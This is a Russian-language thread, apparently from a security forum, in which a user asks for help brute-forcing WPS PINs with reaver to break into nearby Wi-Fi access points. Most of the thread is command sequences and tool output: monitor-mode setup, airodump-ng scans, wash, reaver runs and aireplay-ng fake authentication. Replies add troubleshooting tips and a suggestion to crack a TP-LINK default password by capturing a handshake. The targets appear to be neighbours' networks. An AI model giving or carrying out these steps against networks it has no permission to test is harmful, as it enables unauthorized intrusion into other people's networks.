ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Если у ТП-Линка ESSID типа TP-LINK_65DE, попробуй поймать хендшейк и сбрутить 8 цифр. По умолчанию у них пароль=WPS, по крайней мере, мне таких немало попадалось.

Помогите запустить reaver на подбор пина плс.

Имею: ноут со встроенным Wi-Fi, внешний USB-Wi-Fi на чипсете RT3070, KALI версия январь 2016 (загрузка KALI с флешки)

Последовательность моих действий такова:

1. iwconfig (показывает что у меня действительно есть 2 wlan адаптера)

2. airmon-ng check kill (убиваю все лишнее)

3.

root@kali:~# airmon-ng start wlan1

PHY Interface Driver Chipset

phy0 wlan0 iwl3945 Intel Corporation PRO/Wireless 3945ABG [Golan] (rev 02)

phy1 wlan1 rt2800usb Ralink Technology, Corp. RT2870/RT3070

(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)

(mac80211 station mode vif disabled for [phy1]wlan1)

4. airodump-ng wlan1mon (получаю список всех доступных точек доступа)

5. wash -i wlan1mon (так wash не работал, wash -i wlan1mon -C а так заработал)

6.

root@kali:~# reaver -i wlan1mon -b 00:11:22:33:44:55 -c 1 -S -L -w

Reaver v1.5.2 WiFi Protected Setup Attack Tool

Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

mod by t6_x & DataHead & Soxrok2212

[+] Waiting for beacon from 00:11:22:33:44:55

[!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: abc)

[!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: abc)

[!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: abc)

^C

(пробовал наугад задавать аргументы к reaver , но результат не менялся пока не наткнулся в инете на такой вариант(ниже))

reaver -i wlan1mon -c 6 -b 00:11:22:33:44:55 -v -v -A -vv

получаю:

[+] Switching wlan1mon to channel 6

[+] Waiting for beacon from 64:70:028:EE:0E

[+] Associated with 64:70:028:EE:0E (ESSID: interzet373)

[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000

[+] Trying pin 12345670.

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[!] WARNING: 25 successive start failures

[+] Sending EAPOL START request

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x02), re-trying last pin

[+] Trying pin 12345670.

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

(это уже лучше смотрится, вроде хоть есть попытка отправить пин, только она длится вечно на одном месте)

Сразу отмечу что сигнал сильный, подскажите плс возможные причины проблемы и варианты их устранения? как заставить reaver перебирать пины?

сначала в отдельном окне

потом в отдлельном окне

Ничего не получается, на шаге:

Все по порядку, делал так:

1. iwconfig

2. airmon-ng check kill

3. airmon-ng start wlan1

4. airodump-ng wlan1mon

5. wash -i wlan1mon -C

6.

root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 wlan1mon

No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)

17:57:14 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1

17:57:24 No such BSSID available.

Please specify an ESSID (-e).

(добавил название сети)

root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 -e abcNetwork wlan1mon

No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)

17:58:03 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1

17:58:13 No such BSSID available.

(эта сеть находится на 6 канале, но aireplay-ng это не понимает)

(выбрал другую точку на 1 канале)

root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 wlan1mon

No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)

17:49:38 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1

17:49:38 Sending Authentication Request (Open System)

...

17:50:08 Sending Authentication Request (Open System)

Attack was unsuccessful. Possible reasons:

* Perhaps MAC address filtering is enabled.

* Check that the BSSID (-a option) is correct.

* Try to change the number of packets (-o option).

* The driver/card doesn't support injection.

* This attack sometimes fails against some APs.

* The card is not on the same channel as the AP.

* You're too far from the AP. Get closer, or lower

the transmit rate.

7. понимаю что уже нет смысла запускать reaver но все равно его запускаю в другом окне.

reaver -i wlan1mon -b 00:11:22:33:44:55 -vv -c 1 -aAwSNE

В результате все как и раньше, что делать?

что говорит , airodump-ng скрин.

Какой адаптер , 3070 ни о чем не говорит.

А я вхожу в режим монитора без airmon'a, попробуй так...

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up

В Kali -Rolling по таким командам ничего не происходит, извратили Backtrack донельзя.

И airmon-ng check kill нужен чтобы убить непонятные процессы, мрак.

В свое время у меня при переборе с флагом "А" и ассоциации с точкой в другом окне ривер пин пропустил. Так что команду: aireplay-ng -1 5 -a [MAC] wlan0

применяю только для проверки ассоциации с точкой.

Как вариант попробовать все проделать на WiFiSlax

вместо скрина, ответ на команду airodump-ng wlan1 ,выглядет так:

CH 5 ][ Elapsed: 42 s ][ 2016-08-14 19:08

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:11:22:33:44:55 -27 25 2 0 4 54e. WPA2 CCMP PSK abcNetwork

список разумеется побольше (штук 25 точек находится).

Сигнал сильный от тех точек которые пытался ломануть.

Адаптер брал на алиэкспрессе, если тут можно то могу потом ссылку дать, сам адаптер выглядет как альфа только с 2-мя антеннами.